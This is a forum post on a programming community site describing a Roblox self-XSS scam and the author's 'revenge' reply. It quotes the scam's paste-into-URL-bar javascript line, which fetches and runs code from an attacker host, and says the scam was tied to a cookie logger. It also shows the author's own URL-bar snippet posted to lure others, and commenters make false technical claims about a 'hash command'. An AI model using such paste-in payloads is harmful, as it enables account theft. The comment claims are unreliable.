Share your repls and programming experiences

← Back to all posts
Getting revenge on a Roblox hacker
SixBeeps (5219)

(This post contains malicious JS code! Only run things if you absolutely know what it does!)

I was just browsing Roblox one day when I get the following message from a user I'd never seen before:

Already, I knew this was a scam of some sort. But, I followed the YT link out of curiosity. On there, it tells you to paste in something into the URL bar:

+javascript:$.get('//rblx.link:3000/1')

With my limited knowledge of JS, I managed to figure out what this code did.

  • javascript:: This stuff should be run as JS code
  • $.get: Using jQuery (I'm assuming) call an HTTP GET request
  • //rblx.link:3000/1: Some kind of link (this will be important)

So, it GETs some data from rblx.link and runs it as JS. But what is this link? I followed it, and all it did was show some code:

// Avatar Texture Downloader script
// @WebGL3D
// 2020-06-04

// Chain of requests that allows us to get the texture hash
var hash = (await (await fetch((await (await fetch("https://www.roblox.com/avatar-thumbnail-3d/json?userId=" + $("meta[name='user-data']").data("userid"))).json()).Url)).json()).textures[0]

// Calculate ID of CDN from hash
for (var i = 31, t = 0; t < 32; t++)
	i ^= hash[t].charCodeAt(0);

// Redirect to avatar texture url
location.href = "https://t" + (i % 8).toString() + ".rbxcdn.com/" + hash

On its own, this doesn't look like anything malicious. However, it was revealed that somehow there was a cookie logger associated with the link. I'm not entirely sure how this logger works or where it is, but many people reported that after using this code, their accounts were hacked and replaced with Trump 2020 stuff. I'll admit, I had also found my account like this a week ago, but I never ran the code. Strange, innit?

Anyways, I wanted to get some harmless revenge on whoever did this. I decided to create something similar to the JS that was posted, but make it not track your cookies. I made the Repl below, then posted this comment on the video:

If you run my snippet (It's safe, don't worry!) you can see what it does for yourself :)
Just paste the contents below into the URL bar and remove the + sign. This must be done on a site, not on a new tab.

+javascript:location.href="//rbxavatar--sixbeeps.repl.co"

Comments
hotnewtop
Jasperscode (14)

dud you have no F*cking Idea what that thing does. I found a Minecraft hacked client that was proven to have a hidden backdoor and I know what it does.

Jasperscode (14)

@Jasperscode That "scam" is using the HASH Command to give the "scammer" remote access to your computer via asking for the texture and then when the computer is getting the files it loads a virus that give the hacker full control over anything on the computer.

SixBeeps (5219)

@Jasperscode Uhh, the hash command is supposed to keep a hash table of programs and is only on Linux. How would it be used to access things on a Windows machine? And how would that GET request to the texture call that command?

Jasperscode (14)

@SixBeeps the hash command will work on windows if the program is running

Jasperscode (14)

@Jasperscode it is just less effective

SixBeeps (5219)

@Jasperscode Does it set up something like a VM? Is it some kind of weird port of the program? I don't see how a Unix command that is meant to run in a Unix ecosystem runs on something completely different like Windows.

Jasperscode (14)

@SixBeeps More or less it makes some kind of proxy that connects the files through a VM yes

programmeruser (596)

(sorry for necroposting) If you want to know more about this scam I found this blog post: https://petabyte.heb12.com/blog/?post=27

YPD (1)

BEST. ROLL. EVER.

ZeeMan (8)

Also, real haxxors could steal ur info

ZeeMan (8)

Dont work for me

DynamicSquid (4899)

Damn, those ads really ruins it